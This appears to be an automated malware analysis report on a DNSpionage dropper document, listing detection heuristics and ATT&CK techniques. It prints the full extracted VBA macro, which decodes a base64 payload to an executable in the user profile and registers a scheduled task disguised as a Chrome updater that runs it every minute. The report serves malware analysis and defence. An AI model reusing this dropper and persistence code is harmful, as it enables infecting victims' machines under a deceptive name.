Verdict: MALICIOUS (Risk Score: 238)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1140 Deobfuscate/Decode Files or Information
- T1071.001 Web Protocols
- T1204.002 Malicious File
The sample contains a VBA macro that executes upon opening the document, indicated by the Document_Open heuristic. This macro attempts to create a directory and save a file named 'svshost_serv.doc' to it, which is likely a disguised executable. The script also attempts to decode base64 content and save it as an executable. The presence of heap-spray and NOP-sled heuristics further suggests shellcode execution, which is common in droppers.
Heuristics (9)

- ClamAV: Xls.Dropper.DNSpionage-6773417-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.DNSpionage-6773417-0
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): repeated 0x41 ("A") bytes found
  Disassembly: attempted x86 opcode disassembly
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched lines in script:
  `dinner_add = Environ("userp" & "rofile") & "\.or" & "acleServices\svshost_serv." & "e" & "x" & "e"`
  `Set objFSO = CreateObject("Scripting.FileSystemObject")`
  `If objFSO.FileExists(dinner_add) Then`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): matched lines in script:
  `Attribute VB_Customizable = True`
  `Sub Document_Open()`
  `Dim just_task As Boolean`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): matched lines in script:
  `just_task = False`
  `dinner_add = Environ("userp" & "rofile") & "\.or" & "acleServices\svshost_serv." & "e" & "x" & "e"`
  `Set objFSO = CreateObject("Scripting.FileSystemObject")`
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): long run of 0x41 bytes
  Disassembly: attempted x86 opcode disassembly
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: fd25f106140c087f522d249dcd5cc93252261adba16a22096341d4bd708dc94f) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6901 bytes |
Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
    Dim just_task As Boolean
    just_task = False
    dinner_add = Environ("userp" & "rofile") & "\.or" & "acleServices\svshost_serv." & "e" & "x" & "e"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(dinner_add) Then
        just_task = True
    End If
    If just_task = False Then
        Dim path As String
        path = Environ("userp" & "rofile") & "\.oracleServices"
        If Dir(path, vbDirectory) = "" Then
            MkDir path
        End If
        Text = ""
        Text = UserForm1.Label1.Caption
        Dim winner_add
        winner_add = Environ("userp" & "rofile") & "\.oracleServices\svshost_serv." & "d" & "o" & "c"
        Dim peacher
        Dim DM, EL
        If Application.MouseAvailable Then
            Set DM = CreateObject("Microsoft.XML" & "DOM")
            Set EL = DM.createElement("t" & "mp")
            EL.DataType = "bin.bas" & "e64"
            EL.Text = Text
            peacher = EL.NodeTypedValue
            Dim fileNo As Integer
            fileNo = FreeFile
            Open winner_add For Binary Lock Read Write As #fileNo
            Dim beacher() As Byte
            beacher = peacher
            Put #fileNo, 1, beacher
            Close #fileNo
        End If
    End If
    'If ActiveDocument.Sections.Count = 2 Then
    'ActiveDocument.Sections.First.Range.Delete
    Dim shp As Shape
    For Each shp In ActiveDocument.Shapes
        shp.Visible = True
    Next shp
    Dim res As Integer
    res = MsgBox("Content Made Available", vbSystemModal + vbInformation, "Microsoft Office")
    'End If
End Sub
Function insert_country(insert_string As Variant)
    ' Insert the string in insert_string after the current search position.
    Dim wdApp As Word.Application
    Dim oRng As Range
    Dim Rows_Written As Long
    Set wdApp = Word.Application
    Set oRng = wdApp.Selection.Range
    With oRng
        .Start = .Paragraphs(1).Range.End
        .InsertParagraphAfter
        .Start = .End
        .Text = CStr(insert_string)
        .Font.Name = "Times New Roman"
        .Font.Bold = True
        .Font.Underline = wdUnderlineSingle
        .Font.Size = 12
        .InsertParagraphAfter
    End With
    Rows_Written = Rows_Written + 2
End Function
Sub Document_Close()
    If Application.MouseAvailable Then
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Dim winner_add
        winner_add = Environ("userp" & "rofile") & "\.oracleServices\svshost_serv." & "d" & "o" & "c"
        dinner_add = Environ("userp" & "rofile") & "\.oracleServices\svshost_serv." & "e" & "x" & "e"
        If objFSO.FileExists(winner_add) And Not (objFSO.FileExists(dinner_add)) Then
            Name winner_add As dinner_add
        End If
        Const e0 = "sc"
        Const e1 = "he"
        Const e2 = "ule.ser"
        ' Create the TaskService object.
        Set service = CreateObject(e0 & e1 & "d" & e2 & "vice")
        Call service.Connect
        Dim rootFolder
        Set rootFolder = service.GetFolder("\")
        ' The taskDefinition variable is the TaskDefinition object.
        Dim taskDefinition
        ' The flags parameter is 0 because it is not supported.
        Set taskDefinition = service.NewTask(0)
        ' Define information about the task.
        Dim regInfo
        Set regInfo = taskDefinition.RegistrationInfo
        regInfo.Description = "chromium updater v 37.5.0"
        regInfo.Author = "Google Inc."
        ' Set the principal for the task
        Dim principal
        Set principal = taskDefinition.principal
        ' Set the logon type to interactive logon
        principal.LogonType = 3
        ' Set the task setting info for the Task Scheduler by
        ' creating a TaskSettings object.
        With taskDefinition.settings
            .Enabled = True
            .runonlyifidle = False
            .disallowstartifonbatteries = False
            .multipleinstances = 0
            .allowdemandstart = True
            .StartWhenAvailable = True
            .ExecutionTimeLimit = "P20D"
        End With
        ' Create a time-based trigger.
        With taskDefinition
            Set objTaskTriggers = .triggers
            Set objTaskTrigger = objTaskTriggers.Create(1)
            With objTaskTrigger
                .Enabled = True
                .ID = "" & counter & ""
                ' Time Format YYYY-MM-DDTHH:MM:SS or use ConvertTime Format
                '.StartBoundary = "2013-07-01T08:08:00"
                '.EndBoundary = "2013-07-01T08:08:00"
                .StartBoundary = ConvertTime(DateAdd("h", 0, Now()))
                With .Repetition
                    ' Format For Days = P#D where # is the number of days
                    ' Format for Time = PT#[HMS] Where # is the duration and H for hours, M for minutes, S for seconds
                    '.Duration = "PINF"
                    .Interval = "PT1M"
                    .StopAtDurationEnd = False
                End With 'objTaskRepitition
            End With
        End With
        ' Add an action to the task to run
        Const what_to_do = 0
        Dim Action
        Set Action = taskDefinition.Actions.Create(what_to_do)
        winner_do = """" & Environ("userp" & "rofile") & "\.oracleServices\svshost_serv." & "e" & "x" & "e"""
        'winner_do = """C:\windows\system32\calc.exe"""
        Action.path = winner_do
        ' Register (create) the task.
        Call rootFolder.RegisterTaskDefinition("chrome updater", taskDefinition, 6, , , 3)
    End If
End Sub
Function ConvertTime(DateTimeValue)
    ' Convert a DateTime value to the format needed by
    ' task scheduler
    ' YYYY-MM-DDTHH:MM:SS
    Dim strTime
    strTime = Year(DateTimeValue) & "-"
    strTime = strTime & Right("0" & Month(DateTimeValue), 2) & "-"
    strTime = strTime & Right("0" & Day(DateTimeValue), 2) & "T"
    strTime = strTime & Right("0" & Hour(DateTimeValue), 2) & ":"
    strTime = strTime & Right("0" & Minute(DateTimeValue), 2) & ":"
    strTime = strTime & Right("0" & Day(DateTimeValue), 2)
    ConvertTime = strTime
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{59344D6F-A95F-4083-A5BE-E5597601B819}{D3772A25-DCD2-4486-A88C-185C761A2B79}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```